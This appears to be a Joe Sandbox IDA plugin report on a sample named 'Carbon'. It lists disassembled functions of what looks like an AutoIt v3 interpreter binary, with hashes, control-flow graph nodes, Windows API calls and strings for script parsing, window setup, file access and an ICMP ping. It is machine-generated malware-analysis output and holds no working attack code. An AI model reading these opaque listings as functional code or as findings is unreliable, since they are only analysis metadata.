                                                            • Instruction ID: 4b3b9c94a0557ea0dfcf66d32ed30c47b309269ee6cdc4f819fead9acaccbf6d
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: D531E770B0010ADFC718DF58C490AA9F7AAFF89340B6486A5E409CB656D776EDC1CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F35D5 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 8f35d5-8f3605 call 91015b call 91012b 5 8f362e-8f3640 call 91915b 0->5 6 8f3607-8f3609 0->6 7 8f360a-8f3610 5->7 13 8f3642-8f3654 call 91915b 5->13 6->7 9 8f3625-8f362b 7->9 10 8f3612-8f361d call 91011d call 910164 7->10 18 8f3622 10->18 19 933801-933803 13->19 20 8f365a-8f366c call 91915b 13->20 18->9 19->7 23 933808-93380b 20->23 24 8f3672-8f3684 call 91915b 20->24 23->7 27 933810-933847 call 8f3914 call 8f3853 call 8f3778 call 914cb3 24->27 28 8f368a-8f369c call 91915b 24->28 56 933884-933887 27->56 57 933849-933854 27->57 33 9338aa-9338af 28->33 34 8f36a2-8f36b4 call 91915b 28->34 33->7 36 9338b5-9338d1 call 90e224 33->36 44 9338f3-933904 call 95a13b 34->44 45 8f36ba-8f36cc call 91915b 34->45 47 9338d3-9338d7 36->47 48 9338de-9338e6 36->48 58 933906-93394e call 8fa1d4 * 2 call 8f3c2f call 8f326c call 8fac28 * 2 44->58 59 933958-93395e 44->59 60 8f36ce-8f36e0 call 91915b 45->60 61 8f36e6 45->61 47->36 52 9338d9 47->52 48->7 53 9338ec 48->53 52->7 53->44 64 933872-93387f call 910164 56->64 65 933889-933897 56->65 57->56 63 933856-93385d 57->63 75 933980-933982 58->75 105 933950-933953 58->105 66 933971-93397b call 959f4f 59->66 60->7 60->61 62 8f36e9-8f36f5 call 8f9d04 61->62 83 933960-933965 62->83 84 8f36fb-8f371e call 8f3778 call 8f3853 call 91915b 62->84 63->64 73 93385f-933863 63->73 64->66 80 93389c-9338a5 call 910164 65->80 66->75 73->64 78 933865-933870 73->78 75->7 78->80 80->7 83->7 89 93396b-93396c 83->89 101 8f3770-8f3773 84->101 102 8f3720-8f3732 call 91915b 84->102 89->66 101->62 102->101 107 8f3734-8f3746 call 91915b 102->107 105->7 110 8f375c-8f3765 107->110 111 8f3748-8f375a call 91915b 107->111 110->7 113 8f376b 110->113 111->62 111->110 113->62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 0-1645009161
                                                            • Opcode ID: 941465ecbe3102ae6c228f8538f7f68dd8219f44bfa6becd930ce06c4b65cab7
                                                            • Instruction ID: 68240120b02ed91a91f7fd071cf9634c83be58a3ee0c22ccf9f452cd00d9fd98
                                                            • Opcode Fuzzy Hash: 941465ecbe3102ae6c228f8538f7f68dd8219f44bfa6becd930ce06c4b65cab7
                                                            • Instruction Fuzzy Hash: 9681C571A4420DBBDB10AB74DC42FBA7BA8FF55344F048024FA05EA291E775DB81DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FDCC0 Relevance: 21.6, APIs: 14, Instructions: 644sleepsynchronizationtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetInputState.USER32 ref: 008FDDA7
                                                            • timeGetTime.WINMM ref: 008FDFA7
                                                            • Sleep.KERNEL32(0000000A), ref: 008FE151
                                                            • Sleep.KERNEL32(0000000A), ref: 0094310C
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 009431A7
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 009431BF
                                                            • CloseHandle.KERNEL32(?), ref: 009431D3
                                                            • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 0094323F
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                                            • String ID:
                                                            • API String ID: 388478766-0
                                                            • Opcode ID: 0f84490cdc6425eeda63feacfbbe1f5d48b0f121fccbd6f2c1d2b7cd9b54def8
                                                            • Instruction ID: ef876bc06025997b55c6ef40b2e09c72151d81dbd80e24a95305815f559b91ee
                                                            • Opcode Fuzzy Hash: 0f84490cdc6425eeda63feacfbbe1f5d48b0f121fccbd6f2c1d2b7cd9b54def8
                                                            • Instruction Fuzzy Hash: 7542D07060834AEFD728CB34C844FBAB7A5FF85304F548519F65AC72A1DB74A984DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F29BC Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 008F29EF
                                                            • RegisterClassExW.USER32(00000030), ref: 008F2A19
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F2A2A
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008F2A47
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F2A57
                                                            • LoadIconW.USER32(000000A9), ref: 008F2A6D
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F2A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: b270eb3c8571ee06d3db6265813d89fd0c83520d7a2c73a86a0ee2032c2d2a9e
                                                            • Instruction ID: 1819ca0dc3a80b0ca0b97e349bef20c833e4e73df11ceb4f0006ab9b581cb511
                                                            • Opcode Fuzzy Hash: b270eb3c8571ee06d3db6265813d89fd0c83520d7a2c73a86a0ee2032c2d2a9e
                                                            • Instruction Fuzzy Hash: 3721C2B1D2A318AFDB009FA4ED89B9DBBF4FB08710F10411AF611A63A0D7B54544AF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009309AE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 415 9309ae-9309de call 930782 418 9309e0-9309eb call 922b55 415->418 419 9309f9-930a05 call 925571 415->419 424 9309ed-9309f4 call 922b68 418->424 425 930a07-930a1c call 922b55 call 922b68 419->425 426 930a1e-930a67 call 9306ed 419->426 435 930cd0-930cd6 424->435 425->424 433 930ad4-930add GetFileType 426->433 434 930a69-930a72 426->434 439 930b26-930b29 433->439 440 930adf-930b10 GetLastError call 922b32 CloseHandle 433->440 437 930a74-930a78 434->437 438 930aa9-930acf GetLastError call 922b32 434->438 437->438 444 930a7a-930aa7 call 9306ed 437->444 438->424 442 930b32-930b38 439->442 443 930b2b-930b30 439->443 440->424 454 930b16-930b21 call 922b68 440->454 447 930b3c-930b8a call 9254ba 442->447 448 930b3a 442->448 443->447 444->433 444->438 457 930b9a-930bbe call 9304a0 447->457 458 930b8c-930b98 call 9308fe 447->458 448->447 454->424 465 930bd1-930c14 457->465 466 930bc0 457->466 458->457 464 930bc2-930bcc call 9289fe 458->464 464->435 467 930c16-930c1a 465->467 468 930c35-930c43 465->468 466->464 467->468 470 930c1c-930c30 467->470 471 930c49-930c4d 468->471 472 930cce 468->472 470->468 471->472 474 930c4f-930c82 CloseHandle call 9306ed 471->474 472->435 477 930cb6-930cca 474->477 478 930c84-930cb0 GetLastError call 922b32 call 925683 474->478 477->472 478->477
                                                            APIs
                                                              • Part of subcall function 009306ED: CreateFileW.KERNEL32(00000000,00000000,?,00930A57,?,?,00000000,?,00930A57,00000000,0000000C), ref: 0093070A
                                                            • GetLastError.KERNEL32 ref: 00930AC2
                                                            • __dosmaperr.LIBCMT ref: 00930AC9
                                                            • GetFileType.KERNEL32(00000000), ref: 00930AD5
                                                            • GetLastError.KERNEL32 ref: 00930ADF
                                                            • __dosmaperr.LIBCMT ref: 00930AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00930B08
                                                            • CloseHandle.KERNEL32(?), ref: 00930C52
                                                            • GetLastError.KERNEL32 ref: 00930C84
                                                            • __dosmaperr.LIBCMT ref: 00930C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: H
                                                            • API String ID: 4237864984-2852464175
                                                            • Opcode ID: 495310acb1c80cf3f817337aec42a0d31fc7a9e20faecf199ccd0249fa1b7f90
                                                            • Instruction ID: 6e551bfbcbce665b59880f175d7fc3fcf1cb7cb012cf517a58e89f597afb7aad
                                                            • Opcode Fuzzy Hash: 495310acb1c80cf3f817337aec42a0d31fc7a9e20faecf199ccd0249fa1b7f90
                                                            • Instruction Fuzzy Hash: ADA13732A141589FDF19EF68E862BAD7BA4EB86324F14015DF811EB3D2D7358C12CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F3AE4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 008F3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 008F3DEF
                                                              • Part of subcall function 008F3A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008F3A97
                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008F3C01
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009339E6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00933A27
                                                            • RegCloseKey.ADVAPI32(?), ref: 00933A69
                                                            • _wcslen.LIBCMT ref: 00933AD0
                                                            • _wcslen.LIBCMT ref: 00933ADF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 98802146-2727554177
                                                            • Opcode ID: efc457431d005183bbfbc23434f19eb4d52e55078356758a5f690fbf768b7cb4
                                                            • Instruction ID: a726ceaa6cbe86d6644bb5b8d4fa0fd8c930472b7bda5316960823bb156fc577
                                                            • Opcode Fuzzy Hash: efc457431d005183bbfbc23434f19eb4d52e55078356758a5f690fbf768b7cb4
                                                            • Instruction Fuzzy Hash: 7E7180719183459AC304EF69EC81DABBBE8FF95350F80852EF545C32A0DB709A49DB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F286B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 008F2876
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008F2885
                                                            • LoadIconW.USER32(00000063), ref: 008F289B
                                                            • LoadIconW.USER32(000000A4), ref: 008F28AD
                                                            • LoadIconW.USER32(000000A2), ref: 008F28BF
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F28D7
                                                            • RegisterClassExW.USER32(?), ref: 008F2928
                                                              • Part of subcall function 008F29BC: GetSysColorBrush.USER32(0000000F), ref: 008F29EF
                                                              • Part of subcall function 008F29BC: RegisterClassExW.USER32(00000030), ref: 008F2A19
                                                              • Part of subcall function 008F29BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F2A2A
                                                              • Part of subcall function 008F29BC: InitCommonControlsEx.COMCTL32(?), ref: 008F2A47
                                                              • Part of subcall function 008F29BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F2A57
                                                              • Part of subcall function 008F29BC: LoadIconW.USER32(000000A9), ref: 008F2A6D
                                                              • Part of subcall function 008F29BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F2A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 8f3817a54a1fd8227189c11307554bf906d480ed7ccca1b4d0584481775f91bf
                                                            • Instruction ID: 06e33c06db72a315200777b86099abad993b7870389eebd5931693451d731b66
                                                            • Opcode Fuzzy Hash: 8f3817a54a1fd8227189c11307554bf906d480ed7ccca1b4d0584481775f91bf
                                                            • Instruction Fuzzy Hash: FC21EAB0D39358ABDB10AFA5EC45E997FB4FB48B50F00401AEA04A73A0D7B95540AF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F326C Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 530COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 556 8f326c-8f328f 557 9333b5-9333c8 call 959f4f 556->557 558 8f3295-8f32fe call 91015b call 8f6903 call 8fae03 call 8f6903 * 2 call 8f5e02 556->558 564 9333cf-9333d7 557->564 592 9337e7-9337f7 call 959f4f 558->592 593 8f3304-8f3311 call 8f5c7b call 8f5abf 558->593 566 9333e7-9333ef 564->566 567 9333d9-9333e1 564->567 570 9333f1-9333f8 566->570 571 9333fa-933402 566->571 567->566 569 8f332d-8f339c call 8fae03 call 8f321c call 8fae03 call 8f3ff7 call 8f324f call 8f5ba7 567->569 606 933430-93343b 569->606 607 8f33a2-8f3411 call 8fae03 * 2 call 8f3e34 call 8f6aa4 SetCurrentDirectoryW call 8fac28 * 2 call 91015b call 8f3966 569->607 574 933422-93342b call 95d2e4 570->574 575 933404-93340b 571->575 576 93340d-933415 571->576 574->569 575->574 576->569 579 93341b-93341d 576->579 579->574 598 9337fc 592->598 603 8f3316-8f3327 call 8f5aa8 593->603 598->598 603->564 603->569 606->607 609 933441-933474 call 8f6903 call 8f54de 606->609 653 8f3415-8f341a 607->653 619 93347a-9334a1 call 9633e2 call 8f554c 609->619 620 93377e-933795 call 959f4f 609->620 619->620 636 9334a7-933523 call 91012b call 8fab1f call 8faa39 619->636 628 8f3561-8f35ac call 8fac28 * 2 call 8f6903 call 8fac28 call 8f6903 call 910164 620->628 655 9336eb-933727 call 8fab1f call 9611b5 call 954868 call 914cce 636->655 656 933529-93354b call 8fab1f 636->656 657 8f352d-8f354e call 8f6903 SetCurrentDirectoryW 653->657 658 8f3420-8f342d call 8f9d04 653->658 705 933729-93374e call 8f4d00 call 910164 call 96119d 655->705 671 933561-93356c call 9612bb 656->671 672 93354d-93355c 656->672 657->628 674 8f3550-8f355e call 91011d call 910164 657->674 658->657 673 8f3433-8f344f call 8f3853 call 8f37b3 658->673 688 933589-933594 call 9612a7 671->688 689 93356e-933584 671->689 677 93367d-933690 call 8faa39 672->677 697 9337ca-9337e2 call 959f4f 673->697 698 8f3455-8f346c call 8f3778 call 914cb3 673->698 674->628 677->656 694 933696-9336a0 677->694 708 933596-9335a5 688->708 709 9335aa-9335b5 call 90e546 688->709 689->677 700 9336d3 call 95a2ab 694->700 701 9336a2-9336b0 694->701 697->657 724 8f346e-8f3485 call 916715 698->724 725 8f348b-8f3490 698->725 715 9336d8-9336e5 700->715 701->700 706 9336b2-9336d1 call 8f38a0 701->706 705->628 706->715 708->677 709->677 720 9335bb-9335d7 call 959d32 709->720 715->655 715->656 732 933606-933609 720->732 733 9335d9-933604 call 8fa1d4 call 8fac28 720->733 724->725 739 8f35af-8f35b9 724->739 729 9337ab-9337b3 call 959bfa 725->729 730 8f3496-8f34cf call 8fa1d4 call 8f35d5 725->730 752 9337b8-9337bb 729->752 762 8f34ec-8f34ee 730->762 763 8f34d1-8f34e8 call 910164 call 91011d 730->763 742 933645-933648 732->742 743 93360b-933631 call 8fa1d4 call 8f6cd7 call 8fac28 732->743 784 933632-933643 call 8fab1f 733->784 739->725 749 8f35bf-9337a6 739->749 745 93364a-933653 call 959c61 742->745 746 933669-93366d call 961243 742->746 743->784 770 933753-93377c call 959f4f call 910164 call 914cce 745->770 771 933659-933664 call 910164 745->771 756 933672-93367c call 910164 746->756 749->725 760 9337c1-9337c5 752->760 761 8f35c8-8f35d0 752->761 756->677 760->761 766 8f351a-8f3527 761->766 767 8f35c4 762->767 768 8f34f4-8f34f7 762->768 763->762 766->653 766->657 767->761 768->761 776 8f34fd-8f3500 768->776 770->705 771->656 776->752 783 8f3506-8f3515 call 8f38a0 776->783 783->766 784->756
                                                            APIs
                                                              • Part of subcall function 008F6903: FindCloseChangeNotification.KERNEL32(?,?,?,008F32C7), ref: 008F6923
                                                              • Part of subcall function 008F5E02: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 008F5E30
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F33E0
                                                            • _wcslen.LIBCMT ref: 008F345F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F353D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2701412040-3738523708
                                                            • Opcode ID: 2e5227f02220bb52ef7c2e4f30c736f23643afc0e1307ba6d7e1a70af731d63e
                                                            • Instruction ID: 270b953464b100a062787f41cd7637f9063fd880f68b9da82f5cadcd9ca438ca
                                                            • Opcode Fuzzy Hash: 2e5227f02220bb52ef7c2e4f30c736f23643afc0e1307ba6d7e1a70af731d63e
                                                            • Instruction Fuzzy Hash: 9D126D70508349AFC714EF28C882AAEBBE5FFD5314F00491DF689972A1DB719A49CB53
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00970CE2 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 794 970ce2-970d19 call 8fd530 797 970d1b-970d28 call 8fb81d 794->797 798 970d39-970d4b WSAStartup 794->798 797->798 809 970d2a-970d35 call 8fb81d 797->809 800 970d7e-970dbb call 90c0af call 8f7e30 call 90fac6 inet_addr gethostbyname 798->800 801 970d4d-970d5b 798->801 817 970dbd-970dca IcmpCreateFile 800->817 818 970dcc-970dda 800->818 804 970d60-970d70 801->804 805 970d5d 801->805 806 970d75-970d79 804->806 807 970d72 804->807 805->804 810 970f73-970f7b 806->810 807->806 809->798 817->818 819 970dfd-970e2a call 91015b call 8f3966 817->819 820 970ddf-970def 818->820 821 970ddc 818->821 830 970e55-970e72 IcmpSendEcho 819->830 831 970e2c-970e53 IcmpSendEcho 819->831 823 970df4-970df8 820->823 824 970df1 820->824 821->820 826 970f6a-970f6e call 8fac28 823->826 824->823 826->810 832 970e76-970e78 830->832 831->832 833 970e7a-970e7f 832->833 834 970ed8-970ee6 832->834 837 970e85-970e8a 833->837 838 970f22-970f34 call 8fd530 833->838 835 970eeb-970ef2 834->835 836 970ee8 834->836 839 970f0e-970f17 835->839 836->835 840 970ef4-970f02 837->840 841 970e8c-970e91 837->841 852 970f36-970f38 838->852 853 970f3a 838->853 845 970f1c-970f20 839->845 846 970f19 839->846 843 970f07 840->843 844 970f04 840->844 841->834 847 970e93-970e98 841->847 843->839 844->843 849 970f3c-970f53 IcmpCloseHandle WSACleanup 845->849 846->845 850 970ebd-970ecb 847->850 851 970e9a-970e9f 847->851 849->826 856 970f55-970f67 call 91011d call 910164 849->856 854 970ed0-970ed6 850->854 855 970ecd 850->855 851->840 857 970ea1-970eaf 851->857 852->849 853->849 854->839 855->854 856->826 859 970eb4-970ebb 857->859 860 970eb1 857->860 859->839 860->859
                                                            APIs
                                                            • WSAStartup.WS2_32(00000101,?), ref: 00970D43
                                                            • inet_addr.WSOCK32(?), ref: 00970DA3
                                                            • gethostbyname.WS2_32(?), ref: 00970DAF
                                                            • IcmpCreateFile.IPHLPAPI ref: 00970DBD
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00970E4D
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00970E6C
                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00970F40
                                                            • WSACleanup.WSOCK32 ref: 00970F46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: cfb09d61027750dc296ea4c38c2ed778f7866200d890e28089e69a1bfe34f52c
                                                            • Instruction ID: cbb699fd3df5cf4b8a59ea020ec182a9e5e617f5636e45f8652bfe08c7cb0ef4
                                                            • Opcode Fuzzy Hash: cfb09d61027750dc296ea4c38c2ed778f7866200d890e28089e69a1bfe34f52c
                                                            • Instruction Fuzzy Hash: 87916C72608301EFD720DF29C488B16BBE5EF84318F14C999F4698B6A2C774ED45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F2F92 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
